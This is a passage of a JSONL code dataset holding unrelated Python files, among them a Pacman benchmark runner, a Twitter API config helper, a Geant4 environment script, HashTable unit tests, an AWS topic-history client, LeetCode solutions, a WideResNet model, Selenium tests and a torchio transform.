'train.log'))\n\n # save the args\n for k, v in args.__dict__.items():\n logging.info(\"{}: {}\".format(k, v))\n\n trainer = train_utils(args, save_dir)\n trainer.setup()\n trainer.train()\n\n\n\n\n\n","sub_path":"train_base.py","file_name":"train_base.py","file_ext":"py","file_size_in_byte":3548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"462766580","text":"import pacman\nimport layout\nimport graphicsDisplay\nimport sys\nfrom io import StringIO\nimport csv\n\nif __name__ == '__main__':\n \"\"\"\n test OBJ\n \"\"\"\n pacman_p = 'ReflexAgent'\n depth_p = '2'\n layouts = ['minimaxClassic', 'trappedClassic', 'testClassic', 'smallClassic',\n 'originalClassic', 'openClassic', 'mediumClassic',\n 'contestClassic', 'trickyClassic', 'capsuleClassic']\n depths = ['2']\n\n\n std_out = sys.stdout\n fieldnames = ['Agent', 'layout', 'depth', 'average score', 'average turn time']\n with open('ReflexAgent_A.csv', mode='w', newline='') as csv_file:\n writer = csv.DictWriter(csv_file, fieldnames=fieldnames)\n writer.writeheader()\n\n for layout in layouts:\n for depth in depths:\n sys.argv.append('-p')\n sys.argv.append(pacman_p)\n sys.argv.append('-q')\n sys.argv.append('-k')\n sys.argv.append(depth)\n sys.argv.append('-l')\n sys.argv.append(layout)\n sys.argv.append('-n')\n sys.argv.append('7')\n\n print(sys.argv)\n stream = StringIO()\n sys.stdout = stream\n print(sys.argv)\n # args_i = ['run.py', '-p', 'ReflexAgent', '-q']\n pacman.main()\n\n del sys.argv[:9]\n average_score = float(stream.getvalue().split(\"\\n\")[8].split(\":\")[1])\n average_time = float(stream.getvalue().split(\"\\n\")[12].split(\":\")[1])\n with open('ReflexAgent_A.csv', mode='a', newline='') as f:\n writer = csv.DictWriter(f, fieldnames=fieldnames)\n writer.writerow({'Agent': pacman_p, 'layout': layout, 'depth': depth, 'average score': average_score,\n 'average turn time': average_time})\n stream.close()\n sys.stdout = std_out\n # sys.argv.pop()\n # sys.argv.pop()\n","sub_path":"HW2-pacman/pacman/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":1923,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"640821558","text":"'''Aula 09 - Exerc.07\r\nURI 2116\r\n'''\r\n#Felipe Backes Kettl\r\n\r\ndef isprimo(numero):\r\n count = 0\r\n for j in range(1, numero+1):\r\n if numero % j == 0 :\r\n count +=1\r\n if count == 2:\r\n return True\r\n else:\r\n return False\r\n\r\nn, m = [int(x) for x in input().split()]\r\n\r\nwhile True:\r\n if (2 <= n <= 1000) and (2 <= m <= 1000):\r\n break\r\n n, m = [int(x) for x in input().split()]\r\n\r\nfor j in range(n, 0, -1):\r\n if isprimo(j) == True:\r\n primo1 = j\r\n break\r\n\r\nfor i in range(m, 0, -1):\r\n if isprimo(i) == True:\r\n primo2 = i\r\n break\r\n\r\nprint(primo1 * primo2)","sub_path":"Aula 09/Aula09_Ex07.py","file_name":"Aula09_Ex07.py","file_ext":"py","file_size_in_byte":635,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"153308075","text":"from ConfigParser import ConfigParser\nimport os\nimport tweepy\nimport colored as clrd \nimport json\nimport logging\nlogging.basicConfig(level=logging.INFO)\nlogger = logging.getLogger('drsa-twitter')\n\ndef color(text, fg=None, bg=None, bold=False):\n res = text\n if fg:\n res = \"%s%s\" % (clrd.fg(fg), res)\n if bg:\n res = \"%s%s\" % (clrd.bg(fg), res)\n if bold:\n res = \"%s%s\" % (clrd.attr('bold'), res)\n if fg or bg or bold:\n res = \"%s%s\" % (res, clrd.attr('reset'))\n return res\n\ndef get_config():\n default_fname = os.environ.get('DRSA_TWITTER_CONFIG', 'config.cfg')\n\n fname = None\n config_paths = ['/etc/drsa-toolkit/twitter.cfg', default_fname]\n for i in config_paths:\n if os.path.exists(i):\n fname = i\n\n if fname is None:\n raise RuntimeError(\n \"Unable to find config file in %s\" % ', '.join(config_paths)\n )\n\n cp = ConfigParser()\n cp.readfp(open(fname))\n\n result = {\n 'consumer-key': cp.get('drsa-twitter', 'consumer-key'),\n 'consumer-secret': cp.get('drsa-twitter', 'consumer-secret'),\n 'access-token-key': cp.get('drsa-twitter', 'token-key'),\n 'access-token-secret': cp.get('drsa-twitter', 'token-secret'),\n 'woeid': cp.get('drsa-twitter', 'woeid')\n }\n\n return result\n\ndef get_auth():\n\n config = get_config()\n\n auth = tweepy.OAuthHandler(config['consumer-key'], config['consumer-secret']) #OAuth object\n auth.set_access_token(\n config['access-token-key'],\n config['access-token-secret']\n )\n\n return auth\n\ndef get_api():\n auth = get_auth()\n return tweepy.API(\n auth,\n retry_count=200,\n retry_delay=30,\n retry_errors=[404,403,502,503],\n timeout=20,\n wait_on_rate_limit=True,\n wait_on_rate_limit_notify=True\n )\n\n\ndef save_or_discard(data, f):\n d = data\n with open(f, 'a') as output:\n timezone = d['user']['time_zone'] or ''\n if timezone.upper() in ['KUALA LUMPUR', '']:\n output.write(json.dumps(data) + '\\n')\n logger.info('%s[%s %s]: @%s (%s) %s' % (\n color('STORED', 'green', bold=True),\n color(data['created_at'], 'blue'),\n color(timezone.upper(), 'yellow'),\n color(d['user']['screen_name'], bold=True),\n d['user']['name'],\n d['text'])\n )\n else:\n logger.info('%s[%s %s]: @%s (%s) %s' % (\n color('DISCARD', 'red', bold=True),\n color(data['created_at'], 'blue'),\n color(timezone.upper(), 'yellow'),\n color(d['user']['screen_name'], bold=True),\n d['user']['name'],\n d['text'])\n )\n","sub_path":"src/drsa/twitter/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":2802,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"319911307","text":"#!/usr/bin/python\n'''\nProduces POSIX commands to setup the environment variables for Geant4.\n\nRequired command line arguments:\n1: Location of geant4.sh script.\n2: Version of Geant4.\n'''\n\nimport os\nimport sys\nimport re\nimport subprocess as subp\nfrom codecs import encode,decode\n\ngeant4_sh, geant4_version = sys.argv[1:]\n\n# vars and standard directory names\ngeant4_vars = {\n \"G4ABLADATA\" : \"G4ABLA\",\n \"G4LEDATA\" : \"G4EMLOW\",\n \"G4LEVELGAMMADATA\" : \"PhotonEvaporation\",\n \"G4NEUTRONHPDATA\" : \"G4NDL\",\n \"G4NEUTRONXSDATA\" : \"G4NEUTRONXS\",\n \"G4PIIDATA\" : \"G4PII\",\n \"G4RADIOACTIVEDATA\": \"RadioactiveDecay\",\n \"G4REALSURFACEDATA\": \"RealSurface\",\n \"G4ENSDFSTATEDATA\" : \"G4ENSDFSTATE2.2\",\n \"G4SAIDXSDATA\" : \"G4SAIDDATA1.1\"\n}\n\ngeant4_env = {}\n\n# try to get vars from geant4.sh script\nif os.path.isfile(geant4_sh):\n p = subp.Popen(\"/bin/bash\",\n stdin=subp.PIPE,\n stdout=subp.PIPE,\n cwd=os.path.dirname(geant4_sh),\n env={})\n penv = decode(p.communicate(encode(\"source geant4.sh && env\"))[0].strip())\n for line in penv.split(\"\\n\"):\n sep = line.index(\"=\")\n var = line[:sep]\n value = line[sep+1:]\n if var in geant4_vars:\n geant4_env[var] = value\n\nformatted_pairs = []\nfor var in geant4_vars:\n\n value = None\n if var in os.environ:\n # warn user that existing environment variables override this script,\n # but don't complain if we are just running inside an env-shell.sh\n value = os.environ[var]\n if not \"I3_SHELL\" in os.environ:\n sys.stderr.write((\"Warning: Geant4 environment variable already set {0}={1}, \"\n \"this overrides automatic detection\\n\")\n .format(var, value))\n elif var in geant4_env:\n value = geant4_env[var]\n\n if value is None:\n sys.stderr.write((\"Warning: Geant4 environment variable {0} could not be set, \"\n \"g4-based modules may crash\\n\").format(var))\n else:\n formatted_pairs.append(\"{0}={1}\".format(var, value)) \n\n# extra formatting for env-shell.sh \nsys.stdout.write(\" \\\\\\n\\t\".join(formatted_pairs))\n","sub_path":"cmake/make_geant4_env.py","file_name":"make_geant4_env.py","file_ext":"py","file_size_in_byte":2251,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"497777741","text":"__author__ = 'lin'\nfrom django.conf.urls import url\n\nfrom . import views\n\nurlpatterns = [\n url(r'^$', views.index, name='index'),\n url(r'^company/page/(.*)', views.company_detail, name='company'),\n url(r'^query/(.*)', views.search_companys, name='search'),\n url(r'^company/info/(.*)', views.get_company_detail, name='companyInfo'),\n]","sub_path":"search/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"309431394","text":"import unittest\nimport random\nfrom hashtable import HashTable\n\n# The Unit Test Suite for HashTable\nclass TestContainer(unittest.TestCase):\n # The constructor working properly\n def test_constructor_success(self):\n size = random.randint(1, 100)\n x = HashTable(size)\n self.assertTrue(x)\n self.assertEqual(x.size, size)\n self.assertTrue(len(x.buckets)>size)\n self.assertEqual(x.itemCount, 0)\n\n # The Constructor given a size too small\n def test_constructor_value_error(self):\n size = 0\n try:\n x = HashTable(size)\n self.assertTrue(False)\n except ValueError:\n self.assertTrue(True)\n\n # The Constructor given an non-int\n def test_constructor_type_error(self):\n size = \"hello\"\n try:\n x = HashTable(size)\n self.assertTrue(False)\n except TypeError:\n self.assertTrue(True)\n\n # All actions should fail if given a non-string key\n def test_key_error(self):\n size = 1\n x = HashTable(size)\n try:\n x.begin_action(1)\n self.assertTrue(False)\n except TypeError:\n self.assertTrue(True)\n\n # Makes sure set returns true and increments itemCount\n def test_set_success(self):\n size = 1\n x = HashTable(size)\n self.assertTrue(x.set(\"test\", 1))\n self.assertEqual(x.itemCount, 1)\n\n # Makes sure set fails if the table is full\n def test_set_failure(self):\n size = 1\n x = HashTable(size)\n x.set(\"test\", 1)\n self.assertFalse(x.set(\"test2\", 1))\n\n # Makes sure that get returns correct value when value exists\n def test_get_success(self):\n size = 1\n x = HashTable(size)\n x.set(\"test\", 1)\n self.assertTrue(x.get(\"test\"))\n self.assertEqual(x.get(\"test\"), 1)\n\n # Makes sure that get returns the most recent value if set is\n # used twice with the same key. Also checks that itemCount is not\n # incremented\n def test_update(self):\n size = 1\n x = HashTable(size)\n x.set(\"test\", 1)\n x.set(\"test\", 2)\n self.assertEqual(x.get(\"test\"), 2)\n self.assertEqual(x.itemCount, 1)\n\n # Makes sure that x returns none for non-existing entries\n def test_get_failure(self):\n size = 1\n x = HashTable(size)\n self.assertIsNone(x.get(\"test\"))\n\n # Makes sure deleting an existing entry returns the value,\n # decrements the item count, and removes the entry\n def test_delete_success(self):\n size = 1\n x = HashTable(size)\n x.set(\"test\", 1)\n self.assertEqual(x.delete(\"test\"), 1)\n self.assertEqual(x.itemCount, 0)\n self.assertFalse(x.get(\"test\"))\n\n # Makes sure deleting non existant values returns None\n def test_delete_failure(self):\n size = 1\n x = HashTable(size)\n self.assertFalse(x.delete(\"test\"))\n\n # Tests that the type can handle alot of entries and\n # always appropriately calculates load\n def test_load(self):\n size = 100\n x = HashTable(size)\n for i in range(x.size):\n self.assertTrue(x.set(\"test\"+str(i), i))\n self.assertEqual(x.load(), float(i+1)/float(size))\n\n# Runs all tests\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":3328,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"193451677","text":"\"\"\"\nYou are given a string s. You need to reverse the string.\n\nExample 1:\n\nInput:\ns = Geeks\nOutput: skeeG\nExample 2:\n\nInput:\ns = for\nOutput: rof\n\"\"\"\n\ndef reverseword(arr):\n i=0\n j=len(arr)-1\n while(i now or self.end > now:\n return False\n\n if self.start > self.end:\n return False\n\n if self.include_wrapper and self.checkpoint is not None:\n return False\n\n if self.rec_only and self.fetch_last_written:\n return False\n\n if self.rec_only and self.path:\n return False\n\n if self.rec_only and self.min_max:\n return False\n\n if self.min_max and self.checkpoint is None:\n return False\n\n if self.exclude_remainder and self.checkpoint is None:\n return False\n\n return True\n\n\n # ----------------------------------------------------------------------------------------------------------------\n\n def next_params(self, start):\n return TopicHistoryRequest(self.topic, start, self.end, self.path, self.fetch_last_written, self.checkpoint,\n self.include_wrapper, self.rec_only, self.min_max, self.exclude_remainder,\n self.backoff_limit, self.fetch_last_written_before).params()\n\n\n def change_params(self, start, end):\n return TopicHistoryRequest(self.topic, start, end, self.path, self.fetch_last_written, self.checkpoint,\n self.include_wrapper, self.rec_only, self.min_max, self.exclude_remainder,\n self.backoff_limit, self.fetch_last_written_before)\n\n\n def params(self):\n params = {\n self.TOPIC: self.topic,\n self.START: None if self.start is None else self.start.utc().as_iso8601(include_millis=True),\n self.END: self.end.utc().as_iso8601(include_millis=True)\n }\n\n if self.path is not None:\n params[self.PATH] = self.path\n\n if self.fetch_last_written:\n params[self.FETCH_LAST_WRITTEN] = 'true'\n\n if self.checkpoint is not None:\n params[self.CHECKPOINT] = self.checkpoint\n\n if self.include_wrapper:\n params[self.INCLUDE_WRAPPER] = 'true'\n\n if self.rec_only:\n params[self.REC_ONLY] = 'true'\n\n if self.min_max:\n params[self.MIN_MAX] = 'true'\n\n if self.exclude_remainder:\n params[self.EXCLUDE_REMAINDER] = 'true'\n\n if self.fetch_last_written_before:\n params[self.FETCH_LAST_WRITTEN_BEFORE] = 'true'\n\n if self.backoff_limit:\n params[self.BACKOFF_LIMIT] = self.backoff_limit\n\n return params\n\n\n # ----------------------------------------------------------------------------------------------------------------\n\n @property\n def checkpoint(self):\n if self.__checkpoint is None:\n return None\n\n if self.__checkpoint == 'auto':\n return self.checkpoint_table(self.start, self.end)\n\n return self.__checkpoint\n\n\n # ----------------------------------------------------------------------------------------------------------------\n\n @property\n def topic(self):\n return self.__topic\n\n\n @property\n def start(self):\n return self.__start\n\n\n @property\n def end(self):\n return self.__end\n\n\n @property\n def path(self):\n return self.__path\n\n\n @property\n def fetch_last_written(self):\n return self.__fetch_last_written\n\n\n @property\n def include_wrapper(self):\n return self.__include_wrapper\n\n\n @property\n def rec_only(self):\n return self.__rec_only\n\n\n @property\n def min_max(self):\n return self.__min_max\n\n\n @property\n def exclude_remainder(self):\n return self.__exclude_remainder\n\n\n @property\n def fetch_last_written_before(self):\n return self.__fetch_last_written_before\n\n\n @property\n def backoff_limit(self):\n return self.__backoff_limit\n\n\n # ----------------------------------------------------------------------------------------------------------------\n\n def __str__(self, *args, **kwargs):\n return \"TopicHistoryRequest:{topic:%s, start:%s, end:%s, path:%s, fetch_last_written:%s, checkpoint:%s, \" \\\n \"include_wrapper:%s, rec_only:%s, min_max:%s, exclude_remainder:%s, \" \\\n \"fetch_last_written_before:%s, backoff_limit:%s}\" % \\\n (self.topic, self.start, self.end, self.path, self.fetch_last_written, self.__checkpoint,\n self.include_wrapper, self.rec_only, self.min_max, self.exclude_remainder,\n self.fetch_last_written_before, self.backoff_limit)\n\n\n# --------------------------------------------------------------------------------------------------------------------\n\nclass TopicHistoryResponse(APIResponse):\n \"\"\"\n classdocs\n \"\"\"\n\n # ----------------------------------------------------------------------------------------------------------------\n\n @classmethod\n def construct_from_jdict(cls, jdict):\n if not jdict:\n return None\n\n fetched_last = jdict.get('fetchedLastWrittenData')\n interval = jdict.get('interval')\n\n items = []\n for msg_jdict in jdict.get('Items'):\n item = Message.construct_from_jdict(msg_jdict) if 'payload' in msg_jdict else msg_jdict\n items.append(item)\n\n next_url = jdict.get('next')\n\n return cls(fetched_last, interval, items, next_url)\n\n\n # ----------------------------------------------------------------------------------------------------------------\n\n def __init__(self, fetched_last, interval, items, next_url):\n \"\"\"\n Constructor\n \"\"\"\n self.__fetched_last = fetched_last # \"Fetched last written data\" flag\n self.__interval = interval # int\n\n self.__items = items # list of Message\n\n self.__next_url = next_url # URL string\n\n\n def __len__(self):\n return len(self.items)\n\n\n # ----------------------------------------------------------------------------------------------------------------\n\n def next_params(self, params):\n next_params = parse_qs(urlparse(self.next_url).query)\n\n # noinspection PyTypeChecker\n params[TopicHistoryRequest.START] = next_params[TopicHistoryRequest.START][0]\n\n\n # ----------------------------------------------------------------------------------------------------------------\n\n def as_json(self):\n jdict = OrderedDict()\n\n if self.fetched_last is not None:\n jdict['fetchedLastWrittenData'] = self.fetched_last\n\n if self.items is not None:\n jdict['interval'] = None if self.interval is None else int(round(self.interval))\n\n jdict['Items'] = self.items\n jdict['itemCount'] = len(self.items)\n\n if self.next_url is not None:\n jdict['next'] = self.next_url\n\n return jdict\n\n\n # ----------------------------------------------------------------------------------------------------------------\n\n def start(self):\n if not self.items:\n return None\n\n item = self.items[0]\n\n try:\n return item['rec']\n except TypeError:\n return item.payload['rec']\n\n\n def end(self):\n if not self.items:\n return None\n\n item = self.items[-1]\n\n try:\n return item['rec']\n except TypeError:\n return item.payload['rec']\n\n\n # ----------------------------------------------------------------------------------------------------------------\n\n @property\n def fetched_last(self):\n return self.__fetched_last\n\n\n @property\n def interval(self):\n return self.__interval\n\n\n @property\n def items(self):\n return self.__items\n\n\n @property\n def next_url(self):\n return self.__next_url\n\n\n # ----------------------------------------------------------------------------------------------------------------\n\n def __str__(self, *args, **kwargs):\n return \"TopicHistoryResponse:{fetched_last:%s, interval:%s, items:%s, next_url:%s}\" % \\\n (self.fetched_last, self.interval, Str.collection(self.items), self.next_url)\n","sub_path":"src/scs_core/aws/manager/topic_history_manager.py","file_name":"topic_history_manager.py","file_ext":"py","file_size_in_byte":15057,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"160941948","text":"#!/usr/bin/python3\n\nimport sys, os, random\n\nprint(\"What is your name: \", end='')\n# stdout is flushed every newline\nsys.stdout.flush()\nname = sys.stdin.readline()\n# Print automaticaly inserts space between tokens\nprint(\"Hello\", name)\n\n","sub_path":"python/08-userinput.py","file_name":"08-userinput.py","file_ext":"py","file_size_in_byte":234,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"388617235","text":"# 给定一个字符串 s,找到 s 中最长的回文子串。你可以假设 s 的最大长度为 1000。\n\n\nclass Solution:\n def longestPalindrome(self, s: str) -> str:\n length = len(s)\n start = 0\n end = 0\n if len(s) == 1:\n return s\n for i in range(length):\n for j in range(i + 1, length + 1):\n if s[i: j] == s[i: j][::-1] and j - i > end - start:\n end = j\n start = i\n return s[start: end]\n# 评价:leetcode上传后返回内部出错的错误类型,需要更改\n\n# 利用动态规划的正确解法如下,\n# 考虑到s为空或者为单个字符的时候直接输出,\n# 外循环表示子串的长度,从length减到1,内循环表示下标的变化,从0到len(s)-length+1\n# 技巧点:从大到小进行循环,所以不需要判断条件,第一个符合条件的就直接输出\n#\n# class Solution:\n# def longestPalindrome(self, s: str) -> str:\n# if len(s) <= 1:\n# return s\n# for length in range(len(s), 0, -1):\n# for i in range(0, len(s)-length+1):\n# now_s = s[i:i+length]\n# if now_s == now_s[::-1]:\n# return now_s\n#\n# # 改进:该方法进行判断回文的时候时间复杂度为T(n),需要在此基础上进行改进\n#\n# # 方法:先定义一个函数,使用中心扩散法寻找从i,j位置开始的最长子串,j = i 或者i + 1,这是考虑到奇数和偶数两种情况,使用函数减少代码的重复\n# # 然后遍历一次数组判断以i位置为中心找到的最大回文\n#\n#\n# class Solution:\n# def longestPalindrome(self, s: str) -> str:\n# def helper(s, i, j):\n# while i >= 0 and j < len(s) and s[i] == s[j]:\n# i -= 1\n# j += 1\n# return s[i + 1: j]\n# res = ''\n# for i in range(len(s)):\n# tmp = helper(s, i, i)\n# if len(tmp) > len(res):\n# res = tmp\n# tmp = helper(s, i, i + 1)\n# if len(tmp) > len(res):\n# res = tmp\n# return res\n\n\nif __name__ == '__main__':\n test = 'babad'\n a = Solution()\n print(a.longestPalindrome(test))","sub_path":"python/Day2/longestpalindrome.py","file_name":"longestpalindrome.py","file_ext":"py","file_size_in_byte":2271,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"280192424","text":"import math\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nimport sys\nimport os\nfile_path = os.path.dirname(__file__)\nsys.path.append(os.path.join(file_path, '../../super_module'))\nsys.path.append(os.path.join(file_path, '../'))\nsys.path.append(file_path)\nimport super_class\nimport wideresnet_super as wrnsuper\n\n\nclass WideResNet(wrnsuper.WideResNetSuper, super_class.DeepOriginalModel):\n rank_accumulator = 0\n def __init__(self, depth, num_classes, ConvF=nn.Conv2d, LinearF=nn.Linear, ranks=None, widen_factor=1, dropRate=0.0):\n super(WideResNet, self).__init__(\n depth=depth, \n num_classes=num_classes, \n ConvF=ConvF, \n LinearF=LinearF, \n ranks=ranks, \n widen_factor=widen_factor, \n dropRate=dropRate\n )\n\n\nif __name__ == \"__main__\":\n net = WideResNet(depth=16, num_classes=10, ranks=None, widen_factor=8, dropRate=0.4)\n y = net(torch.randn(1,3,32,32))\n print(y.size())","sub_path":"svhn/wrn/wideresnet_dense.py","file_name":"wideresnet_dense.py","file_ext":"py","file_size_in_byte":997,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"13852248","text":"## own files\nfrom config import mysql\nfrom extensions import * \n\nlogout_controller = Blueprint('logout', __name__)\n\n@logout_controller.route(\"/logout\", methods = [\"GET\", \"POST\"])\ndef logoutpage():\n\tuser = session.get('username')\n\tsession.clear()\n\tif (user != None):\n\t\tflash(user + \" has logged out successfully!\", 'Success')\n\treturn redirect(url_for('login.loginpage'))\n","sub_path":"logout.py","file_name":"logout.py","file_ext":"py","file_size_in_byte":370,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"67986849","text":"import re\nimport unittest\nimport time\n\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.support.wait import WebDriverWait\n\nfrom lib.general import login, get_browser\n\n\nclass HW1_Tests(unittest.TestCase):\n def setUp(self):\n driver = get_browser()\n url = \"http://hrm.seleniumminutes.com\"\n driver.get(url)\n\n self.wait = WebDriverWait(driver, 10)\n login(driver)\n self.driver = driver\n\n def tearDown(self):\n self.driver.quit()\n\n def test_quick_launch_menu(self):\n expected_img_name = {\n 'Assign Leave': 'ApplyLeave',\n 'Leave List': 'MyLeave',\n 'Timesheets': 'MyTimesheet',\n 'Apply Leave': 'ApplyLeave',\n 'My Leave': 'MyLeave',\n 'My Timesheet': 'MyTimesheet',\n }\n\n driver = self.driver\n\n quick_launch_menu = driver.find_element_by_class_name('quickLaungeContainer')\n all_quick_links = quick_launch_menu.find_elements_by_class_name('quickLinkText')\n\n for link in all_quick_links:\n img_name = self.extract_img_name(\n link.find_element_by_xpath('.//preceding-sibling::img').get_attribute(\n 'src'))\n assert expected_img_name[link.text] == img_name, \\\n \"Expected the image name above the {link_text}\" \\\n \" link to be {expected_img_name}, but it was\" \\\n \" {actual_img_name} instead\".format(\n link_text=link.text,\n expected_img_name=expected_img_name[link.text],\n actual_img_name=img_name)\n\n def test_pim_row_style(self):\n driver = self.driver\n driver.find_element_by_id('menu_pim_viewPimModule').click()\n # self.wait.until(EC.visibility_of_element_located((By.CLASS_NAME, 'odd')))\n all_rows = driver.find_elements_by_css_selector('tbody>tr')\n time.sleep(1)\n for i, row in enumerate(all_rows, 1):\n message = 'Expect the style of row #{0} to be {1}, but it was {2}'\n row_style = row.get_attribute('class')\n if i%2 == 1:\n assert row_style == 'odd', message.format(i, 'odd', row_style)\n else:\n assert row_style == 'even', message.format(i, 'even', row_style)\n\n\n def extract_img_name(self, src):\n return re.search('.*/(\\w+?).png', src).group(1)\n\n\nif __name__ == \"__main__\":\n unittest.main()","sub_path":"EllieSkobelPythonGithub/homework/quickLaungeContainerTest.py","file_name":"quickLaungeContainerTest.py","file_ext":"py","file_size_in_byte":2564,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"211931260","text":"from __future__ import print_function\n\nimport numpy as np\nfrom dynamic_graph.sot_talos_balance.foot_force_difference_controller import (\n FootForceDifferenceController,\n)\nfrom numpy.testing import assert_almost_equal\n\ncontroller = FootForceDifferenceController(\"footController\")\ncontroller.init()\n\ncontroller.dfzAdmittance.value = 1.0\ncontroller.vdcFrequency.value = 0.0\ncontroller.vdcDamping.value = 0.0\n\ngainSwing = 1.0\ngainStance = 2.0\ngainDouble = 3.0\n\ncontroller.wrenchRight.value = np.array([0.0] * 2 + [500.0] + [0.0] * 3)\ncontroller.wrenchLeft.value = np.array([0.0] * 2 + [300.0] + [0.0] * 3)\ncontroller.wrenchRightDes.value = np.array([0.0] * 2 + [400.0] + [0.0] * 3)\ncontroller.wrenchLeftDes.value = np.array([0.0] * 2 + [400.0] + [0.0] * 3)\n\ncontroller.gainSwing.value = gainSwing\ncontroller.gainStance.value = gainStance\ncontroller.gainDouble.value = gainDouble\n\nprint(\"---- Input ----\")\nprint(\"wrenchRight: %s\" % str(controller.wrenchRight.value))\nprint(\"wrenchLeft: %s\" % str(controller.wrenchLeft.value))\nprint(\"wrenchRightDes: %s\" % str(controller.wrenchRightDes.value))\nprint(\"wrenchLeftDes: %s\" % str(controller.wrenchLeftDes.value))\nprint()\n\nprint(\"gainSwing: %s\" % str(controller.gainSwing.value))\nprint(\"gainStance: %s\" % str(controller.gainStance.value))\nprint(\"gainDouble: %s\" % str(controller.gainDouble.value))\nprint()\n\nprint(\"---- Double support ----\")\n\ncontroller.phase.value = 0\n\ncontroller.posRightDes.value = np.eye(4)\ncontroller.posLeftDes.value = np.eye(4)\ncontroller.posRight.value = np.eye(4)\ncontroller.posLeft.value = np.eye(4)\n\ncontroller.vRight.recompute(0)\ncontroller.vLeft.recompute(0)\ncontroller.gainRight.recompute(0)\ncontroller.gainLeft.recompute(0)\n\n# There is more pressure on the right foot.\n# Therefore, the right foot must go up to reduce it\nvRight = [0.0] * 2 + [100.0] + [0.0] * 3\nvLeft = [0.0] * 2 + [-100.0] + [0.0] * 3\n\nprint(\"Expected vRight: %s\" % str(vRight))\nprint(\"Actual vRight: %s\" % str(controller.vRight.value))\nprint(\"Expected vLeft: %s\" % str(vLeft))\nprint(\"Actual vLeft: %s\" % str(controller.vLeft.value))\nprint()\n\nassert_almost_equal(vRight, controller.vRight.value)\nassert_almost_equal(vLeft, controller.vLeft.value)\n\nprint(\"gainRight: %s\" % str(controller.gainRight.value))\nprint(\"gainLeft: %s\" % str(controller.gainLeft.value))\nprint()\n\nassert_almost_equal(gainDouble, controller.gainRight.value)\nassert_almost_equal(gainDouble, controller.gainLeft.value)\n\nprint(\"---- Left support ----\")\ncontroller.phase.value = 1\n\ncontroller.vRight.recompute(1)\ncontroller.vLeft.recompute(1)\ncontroller.gainRight.recompute(1)\ncontroller.gainLeft.recompute(1)\nprint(\"vRight: %s\" % str(controller.vRight.value))\nprint(\"vLeft: %s\" % str(controller.vLeft.value))\nprint()\n\nassert_almost_equal([0.0] * 6, controller.vRight.value)\nassert_almost_equal([0.0] * 6, controller.vLeft.value)\n\nprint(\"gainRight: %s\" % str(controller.gainRight.value))\nprint(\"gainLeft: %s\" % str(controller.gainLeft.value))\nprint()\n\nassert_almost_equal(gainSwing, controller.gainRight.value)\nassert_almost_equal(gainStance, controller.gainLeft.value)\n\nprint(\"---- Right support ----\")\ncontroller.phase.value = -1\n\ncontroller.vRight.recompute(2)\ncontroller.vLeft.recompute(2)\ncontroller.gainRight.recompute(2)\ncontroller.gainLeft.recompute(2)\nprint(\"vRight: %s\" % str(controller.vRight.value))\nprint(\"vLeft: %s\" % str(controller.vLeft.value))\nprint()\n\nassert_almost_equal([0.0] * 6, controller.vRight.value)\nassert_almost_equal([0.0] * 6, controller.vLeft.value)\n\nprint(\"gainRight: %s\" % str(controller.gainRight.value))\nprint(\"gainLeft: %s\" % str(controller.gainLeft.value))\nprint()\n\nassert_almost_equal(gainStance, controller.gainRight.value)\nassert_almost_equal(gainSwing, controller.gainLeft.value)\n","sub_path":"tests/python/test_foot_force_difference_controller.py","file_name":"test_foot_force_difference_controller.py","file_ext":"py","file_size_in_byte":3769,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"157486232","text":"from typing import Union, Optional\n\nimport numpy as np\n\nfrom ... import SpatialTransform\nfrom ....utils import to_tuple\nfrom ....data.subject import Subject\nfrom ....typing import TypeTripletInt\nfrom .crop_or_pad import CropOrPad\n\n\nclass EnsureShapeMultiple(SpatialTransform):\n \"\"\"Crop or pad an image to a shape that is a multiple of :math:`N`.\n\n Args:\n target_multiple: Tuple :math:`(w, h, d)`. If a single value :math:`n`\n is provided, then :math:`w = h = d = n`.\n method: Either ``'crop'`` or ``'pad'``.\n **kwargs: See :class:`~torchio.transforms.Transform` for additional\n keyword arguments.\n\n Example:\n >>> import torchio as tio\n >>> image = tio.datasets.Colin27().t1\n >>> image.shape\n (1, 181, 217, 181)\n >>> transform = tio.EnsureShapeMultiple(8, method='pad')\n >>> transformed = transform(image)\n >>> transformed.shape\n (1, 184, 224, 184)\n >>> transform = tio.EnsureShapeMultiple(8, method='crop')\n >>> transformed = transform(image)\n >>> transformed.shape\n (1, 176, 216, 176)\n >>> image_2d = image.data[..., :1]\n >>> image_2d.shape\n torch.Size([1, 181, 217, 1])\n >>> transformed = transform(image_2d)\n >>> transformed.shape\n torch.Size([1, 176, 216, 1])\n\n \"\"\"\n def __init__(\n self,\n target_multiple: Union[int, TypeTripletInt],\n *,\n method: Optional[str] = 'pad',\n **kwargs\n ):\n super().__init__(**kwargs)\n self.target_multiple = np.array(to_tuple(target_multiple, 3))\n if method not in 